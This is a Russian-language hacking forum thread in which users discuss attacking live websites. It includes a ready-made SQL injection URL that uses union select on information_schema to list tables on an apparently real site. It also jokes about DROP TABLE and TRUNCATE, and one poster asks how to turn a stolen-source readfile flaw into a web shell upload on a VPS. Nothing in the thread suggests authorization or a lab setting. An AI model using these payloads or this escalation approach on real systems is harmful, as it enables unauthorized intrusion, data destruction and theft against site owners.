DROP TABLE "table_name"

только зачем!?

Тренировка и практика еще никому не мешали

тренируйся на кошках (с)

Но если не трудно можете показать на примере вот здесь список таблиц

http://www.stromgren.com/products.php?id=22+and+1=0+union+select+group_conc at(table_name+separator+0x3a)+from+information_sch ema.tables+where+table_schema=0x73776173696e676572--

А меня склоняло к мысли о TRUNCATE

Есть скрипт с отсутствием фильтрации в вызове функции readfile. С помощью этой уязвимости утянул исходники, но больше в них зацепиться не за что: нет инъекций, нет упоминаний админки (да и я не уверен, что она вообще существует), нет L/RFI, XSS, аворизации, системы прав, заливки файлов. Вообще ничего интересного кроме readfile. Можно ли вытянуть из этого что-то полезное?

Интересует заливка шелла.

Директивы open_basedir нет, однако (видимо из-за прав) получить файл httpd.conf не получилось.

Сайт лежит на VPS. Сайтов на сервере несколько, однако к одному IP привязан только один домен, так что через поиск сайтов по IP ничего узнать не вышло. Удалось установить наличие ещё одного сайта со своим собственным IP, однако и в его исходниках нет ничего интересного.

Есть доступ к phpinfo и некоторым файлам конфигурации.

Что можете подсказать?

Ты линк выложи, а мы посмотрим.

Как-нибудь в другой раз. Здесь смотреть особо не на что, всю доступную инфу я озвучил, интересует направления, в которых думать дальше.

delete